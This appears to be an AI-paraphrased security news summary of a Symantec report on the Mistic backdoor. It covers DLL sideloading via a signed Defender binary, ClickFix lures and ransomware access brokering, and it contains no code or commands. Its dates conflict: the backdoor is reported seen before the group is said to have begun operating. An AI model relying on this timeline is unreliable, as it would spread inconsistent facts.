The Bottom Line: The Mistic backdoor exploits DLL sideloading via a signed Microsoft Defender file for memory-resident code execution and combines in-memory persistence with credential-stealing capabilities.
Symantec researchers have identified a new backdoor called Mistic, deployed by the threat actor group Woodgnat (KongTuke) since April. Mistic serves as an entry mechanism for ransomware gangs, to whom Woodgnat sells network access.
Mistic has been detected in enterprise intrusions since April 2024 across multiple industries: insurance, education, IT, and professional services. In some cases, the backdoor operates in conjunction with ModeloRAT, a Python-based malware attributed to Woodgnat. Symantec observed ModeloRAT delivering the Qilin ransomware.
The infiltration method exploits DLL sideloading: attackers deliver MpExtMs.exe, a digitally signed file from Microsoft Defender. This executable searches for version.dll, which in turn loads EndpointDlp.dll — in reality, the Mistic backdoor itself. The code executes entirely in memory without leaving files on disk. Additional features include file management (write, delete, move), file transfer with the C2 server, and a kill switch for covert persistence.
Woodgnat has operated since May 2024 and has supplied multiple ransomware gangs over two years: Interlock, Rhysida, Akira, 8Base, and Black Basta. Initial compromise occurs predominantly through ClickFix campaigns, which coerce users to execute PowerShell commands via fake CAPTCHA tests or crash simulations. Since April, Woodgnat has also used Microsoft Teams to impersonate IT support and guide victims through malicious copy-paste sequences.
After initial infection, Woodgnat profiles machines to assess their value for sale. The use of memory-resident execution and a custom-developed backdoor marks a trend: initial-access brokers are returning to custom malware rather than relying solely on “living-off-the-land” tactics.
Source: www.csoonline.com · Published June 25, 2026
Lumi AI News — AI-assisted curation pursuant to Art. 50 EU AI Act. Paraphrase and classification by Lumi News Pipeline v1.7.1.